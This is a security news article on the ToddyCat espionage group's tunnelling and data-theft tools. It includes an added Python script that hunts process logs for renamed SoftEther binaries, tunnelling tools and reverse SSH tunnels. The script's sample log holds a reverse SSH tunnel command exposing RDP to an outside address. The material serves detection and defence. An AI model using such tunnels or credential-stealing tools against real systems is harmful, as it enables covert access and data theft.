The threat actor known as ToddyCat has been observed using a wide range of tools to maintain access to compromised environments and steal valuable data.
Russian cybersecurity firm Kaspersky described the adversary as relying on various programs to collect “industrial-scale” data from primarily government organizations, some of them defense-related, located in the Asia-Pacific region.
“To collect large volumes of data from many hosts, attackers must automate the data collection process as much as possible and provide several alternative means of continuously accessing and monitoring the systems they attack,” security researchers Andrey Gunkin, Alexander Fedotov and Natalya Shornikova said.
ToddyCat was first documented by the company in June 2022 in connection with a series of cyberattacks targeting government and military entities in Europe and Asia since at least December 2020. These intrusions leveraged a passive backdoor called Samurai that allows remote access to compromised resources.
Since then, a closer examination of the threat actor's tradecraft has uncovered additional data exfiltration tools such as LoFiSe and Pcexter, which collect data and upload archive files to Microsoft OneDrive.
The latest set of programs involves a mix of tunneling and data collection software, which are used after the attacker has already gained access to privileged user accounts on the infected system. This includes –
- Reverse SSH tunnel using OpenSSH
- SoftEther VPN, which is renamed to seemingly harmless files such as “boot.exe”, “mstime.exe”, “netscan.exe” and “kaspersky.exe”
- Ngrok and Krong to encrypt and redirect command and control (C2) traffic to a certain port on the target system
- FRP client, an open source fast reverse proxy based on Golang
- Cuthead, a .NET compiled executable to search for documents by a specific extension, file name, or modification date
- WAExp, a .NET program for capturing data associated with the WhatsApp web app and saving it as an archive
- TomBerBil to extract cookies and credentials from web browsers such as Google Chrome and Microsoft Edge
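The tool list above gives a defender two concrete handles: the innocuous file names SoftEther VPN was renamed to, and the fact that the other tunnels (reverse SSH, Ngrok, FRP) leave recognisable command lines. The following Python script is an added example, not code from Kaspersky or from the article, showing how those handles turn into detection logic over process-creation telemetry. It assumes a constructed `key=value|key=value` record format with the `Image`, `OriginalFileName` and `CommandLine` fields that Sysmon event ID 1 provides; the binary names in `TUNNEL_TOOL_NAMES` and the `vpnserver.exe` original name in the sample log are assumptions for illustration, not values taken from the report.

```python
"""Hunt for the tunneling tools described in the ToddyCat write-up in
process-creation events. Added example; not Kaspersky's or the article's code."""
import re
from dataclasses import dataclass

# File names the report says SoftEther VPN was renamed to on victim hosts.
RENAMED_SOFTETHER = {"boot.exe", "mstime.exe", "netscan.exe", "kaspersky.exe"}

# Assumption: usual executable names for the other tunnelling tools named in the
# report. The article does not list them, so adjust these for your environment.
TUNNEL_TOOL_NAMES = {"ngrok.exe", "frpc.exe", "krong.exe"}

# OpenSSH invoked with -R opens a reverse tunnel back to the remote SSH server.
SSH_REVERSE_TUNNEL = re.compile(
    r"(?:^|[\\/\s])ssh(?:\.exe)?\b.*?\s-R\s*\S+", re.IGNORECASE
)


@dataclass
class Finding:
    rule: str
    image: str
    detail: str


def parse_event(line: str) -> dict:
    """Parse one 'key=value|key=value' record (constructed log format)."""
    fields = {}
    for part in line.strip().split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def basename(path: str) -> str:
    """Lower-cased file name component of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def scan_event(ev: dict) -> list:
    """Apply the four rules to a single parsed event and return any findings."""
    image = ev.get("Image", "")
    name = basename(image)
    original = ev.get("OriginalFileName", "").lower()
    cmd = ev.get("CommandLine", "")
    findings = []
    if name in RENAMED_SOFTETHER:
        findings.append(Finding("renamed-softether", image,
                                f"image name {name} matches a SoftEther alias from the report"))
    # A binary whose on-disk name differs from its PE OriginalFileName has been
    # renamed; legitimate software does this too, so treat it as lower confidence.
    if original and name != original:
        findings.append(Finding("name-mismatch", image,
                                f"on-disk name {name} differs from OriginalFileName {original}"))
    if name in TUNNEL_TOOL_NAMES:
        findings.append(Finding("tunnel-tool", image,
                                f"{name} is a known tunnelling/reverse-proxy binary"))
    if SSH_REVERSE_TUNNEL.search(cmd):
        findings.append(Finding("ssh-reverse-tunnel", image,
                                "ssh invoked with -R (reverse port forward)"))
    return findings


def scan_log(lines) -> list:
    """Run scan_event over every non-empty record and collect the findings."""
    findings = []
    for line in lines:
        if line.strip():
            findings.extend(scan_event(parse_event(line)))
    return findings


# Constructed sample telemetry: one benign service, one renamed SoftEther binary
# (vpnserver.exe as OriginalFileName is an assumption), one reverse SSH tunnel,
# and one FRP client. IP addresses are documentation ranges.
SAMPLE_LOG = """\
Image=C:\\Windows\\System32\\svchost.exe|OriginalFileName=svchost.exe|CommandLine=svchost.exe -k netsvcs
Image=C:\\ProgramData\\boot.exe|OriginalFileName=vpnserver.exe|CommandLine=boot.exe /start
Image=C:\\Windows\\System32\\OpenSSH\\ssh.exe|OriginalFileName=ssh.exe|CommandLine=ssh.exe -N -R 0.0.0.0:2222:127.0.0.1:3389 user@203.0.113.10
Image=C:\\Users\\Public\\frpc.exe|OriginalFileName=frpc.exe|CommandLine=frpc.exe -c frpc.ini
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG.splitlines()):
        print(f"[{f.rule}] {f.image}: {f.detail}")
```

Run against the sample log the script reports the renamed SoftEther binary twice (once by alias, once by the name mismatch), the reverse SSH tunnel and the FRP client, and nothing for the service host. The name-mismatch rule is deliberately separate from the alias list so that a future rename to a name not in the report still surfaces, at the cost of some benign hits that need triage.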
“Attackers actively use techniques to bypass defenses in an attempt to disguise their presence in the system,” Kaspersky said.
“To protect your organization’s infrastructure, we recommend adding resources and IP addresses of cloud services that provide traffic tunneling to your firewall’s deny list. Additionally, users should be advised to avoid storing passwords in their browsers, as this helps attackers access sensitive information.”